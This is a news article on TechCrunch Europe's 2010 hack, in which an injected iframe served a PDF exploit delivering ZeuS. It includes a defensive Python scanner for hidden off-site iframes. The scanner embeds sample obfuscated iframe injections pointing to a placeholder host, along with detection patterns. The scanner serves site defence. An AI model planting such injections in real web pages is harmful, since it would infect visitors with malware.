TechCrunch Europe hacked to spread malware like a poison ivy infection
- TAGS: exploit, hack, malware, PDF vulnerability, security, Techcrunch, WordPress, ZeuS
- IT TOPICS: Cybercrime & Hacking, Internet, Security, Security Hardware & Software
If you visited TechCrunch Europe on Monday, it would be wise to scan your computer for malware. By Monday night, the hack and the malware it served had been cleaned up. But during the day, security-conscious or ticked-off readers tweeted things like, "Warning! TechCrunch Europe serves up malware attack." Other Twitter users tweeted things like, "Hey @MobileCrunch & @TechCrunch - Why is your site flagged by Chrome as having Malware?"
MobileCrunch did not tweet a reply, but TechCrunch Europe acknowledged "the (annoying) malware warning", not once, but twice. Calling the warning annoying suggests it was a nuisance rather than a security problem; for any reader whose machine was infected by visiting the site, it was very much both.
Graham Cluley, Senior Technology Consultant at Sophos, blogged, "A closer examination of TechCrunch Europe's site reveals that the offending code - which uses a malicious iFrame - is found in a JavaScript file, used by the site as part of its WordPress infrastructure. This attempts to serve up a malicious PDF file, exploiting a vulnerability that brings to your computer a nasty infection from the ZBot (also known as Zeus) malware family."
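The injection Cluley describes, an off-site iframe appended to a JavaScript file in the site's WordPress install, is something a site owner can sweep for before Chrome or Google Safe Browsing flags the site. The script below is an added example, not code from this article, from Sophos or from TechCrunch. It assumes the classic drive-by pattern of the period (a hidden or zero-sized iframe pointing off-site, often wrapped in document.write() with unescape() or \xNN escapes), scans .js/.php/.html files, and treats the hostnames and the sample files it embeds as constructed placeholders. It does not touch the PDF exploit itself.

```python
"""Scan a WordPress tree for injected hidden iframes.

Added example, not code from the article, Sophos or TechCrunch. Assumes the
injection looks like the common drive-by pattern: an <iframe> appended to a
legitimate JS/PHP file, pointing off-site, sized 0x0 or hidden with CSS,
often wrapped in document.write() with unescape() or \\xNN escapes.
All hostnames and sample files below are constructed placeholders.
"""
import re
import sys
from pathlib import Path
from urllib.parse import unquote, urlparse

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
SRC_RE = re.compile(r"""src\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)
# Zero width/height attributes or CSS, or CSS that hides the frame outright.
HIDDEN_RE = re.compile(
    r"""(?:width|height)\s*[=:]\s*["']?0(?:px)?\b|display\s*:\s*none|visibility\s*:\s*hidden""",
    re.IGNORECASE,
)
UNESCAPE_RE = re.compile(r"""unescape\(\s*(["'])(.*?)\1\s*\)""", re.IGNORECASE | re.DOTALL)
JS_HEX_RE = re.compile(r"\\x([0-9a-fA-F]{2})")
JS_UNI_RE = re.compile(r"\\u([0-9a-fA-F]{4})")
SCAN_SUFFIXES = {".js", ".php", ".html", ".htm"}


def deobfuscate(text: str) -> str:
    """Undo the cheap string hiding used by these injections so the iframe
    regex can see the markup: unescape('%3C...') calls, \\xNN and \\uNNNN escapes."""
    text = UNESCAPE_RE.sub(lambda m: unquote(m.group(2)), text)
    text = JS_HEX_RE.sub(lambda m: chr(int(m.group(1), 16)), text)
    text = JS_UNI_RE.sub(lambda m: chr(int(m.group(1), 16)), text)
    return text


def find_injected_iframes(text: str, own_hosts: set) -> list:
    """One finding per iframe whose src points off-site (host not in own_hosts)
    or which is hidden from the user. Both together is the classic drive-by shape;
    off-site but visible is reported as well, for manual review."""
    findings = []
    for m in IFRAME_RE.finditer(deobfuscate(text)):
        tag = m.group(0)
        src_m = SRC_RE.search(tag)
        src = src_m.group(1) if src_m else ""
        host = urlparse(src).hostname or ""  # relative src -> "" -> not off-site
        off_site = bool(host) and host not in own_hosts
        hidden = bool(HIDDEN_RE.search(tag))
        if off_site or hidden:
            findings.append({"src": src, "host": host, "off_site": off_site,
                             "hidden": hidden, "tag": tag})
    return findings


def scan_tree(root: Path, own_hosts: set) -> list:
    """Walk a document root and return findings tagged with the relative file path."""
    results = []
    for path in sorted(root.rglob("*")):
        if not path.is_file() or path.suffix.lower() not in SCAN_SUFFIXES:
            continue
        try:
            text = path.read_text(encoding="utf-8", errors="replace")
        except OSError:
            continue
        for hit in find_injected_iframes(text, own_hosts):
            results.append({"path": str(path.relative_to(root)), **hit})
    return results


# Constructed samples (not real indicators): a clean file and two injected variants.
OWN_HOSTS = {"www.example.com"}  # assumption: the site's own hostnames, set by the operator
CLEAN_JS = "jQuery(function ($) { $('#menu').hide(); });\n"
DIRTY_JS_UNESCAPE = CLEAN_JS + (
    'document.write(unescape("%3Ciframe src=%22http://bad-host.invalid/load.php%22 '
    'width=%220%22 height=%220%22 style=%22display:none%22%3E%3C/iframe%3E"));\n'
)
DIRTY_JS_HEX = CLEAN_JS + (
    r'document.write("\x3ciframe src=\x22//bad-host.invalid/x\x22 style=\x22visibility:hidden\x22\x3e");'
    + "\n"
)


def main(argv):
    if len(argv) > 1:
        for hit in scan_tree(Path(argv[1]), OWN_HOSTS):
            print(f"{hit['path']}: src={hit['src']!r} hidden={hit['hidden']} off_site={hit['off_site']}")
        return 0
    for name, text in (("clean", CLEAN_JS), ("unescape", DIRTY_JS_UNESCAPE), ("hex", DIRTY_JS_HEX)):
        print(name, find_injected_iframes(text, OWN_HOSTS))
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it with a path to sweep a document root, or with no argument to see it run over the embedded samples. A hit should be followed by diffing the file against a clean copy of the same WordPress release, since the injected line is usually appended to otherwise legitimate code. The reverse does not hold: packers, string splitting and eval() chains slip past a regex like this, so a clean result is not proof of a clean site.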
According to Trend Micro's Rik Ferguson, only 2 of 43 anti-malware programs detected the malware at the time. It was hosted by Netdirect on a server in Germany. Ferguson called the Zeus infection the "Poison Ivy of the criminal underworld."
A quick Google Safe Browsing search of TechCrunch Europe's site shows suspicious activity twice over the last 90 days. "Of the 128 pages we tested on the site over the past 90 days, 58 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2010-09-06, and the last time suspicious content was found on this site was on 2010-09-06. Malicious software includes 2 exploit(s). Successful infection resulted in an average of 2 new process(es) on the target machine."
This is not the first time TechCrunch has been hacked. A Google Safe Browsing search for TechCrunch shows, "Of the 1111 pages we tested on the site over the past 90 days, 58 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2010-09-06, and the last time suspicious content was found on this site was on 2010-09-06."
In January this year, TechCrunch was hacked as well: it was defaced twice over a two-day period and at times redirected visitors to a third-party site. The U.S. Secret Service contacted TechCrunch about pressing charges. In March, CNET's Elinor Mills reported that TechCrunch got hammered again with malware-laden ads.
TechCrunch has been hit several times now, but it is hardly alone: sites running WordPress have been heavily targeted over the last few years, because the platform's popularity makes it a worthwhile and well-studied target. TechCrunch's huge readership makes it an especially attractive host for a drive-by download, and a site that has been used to spread malware can have a hard time winning back its visitors and its reputation.
Next time, we'll look at the recent attacks on web host (mt) Media Temple, which is ranked the 36th most popular web host company in the world. MT responded when I asked about the swarm of infections in Media Temple sites and what, if anything, it is doing to help repair site owners' reputations.

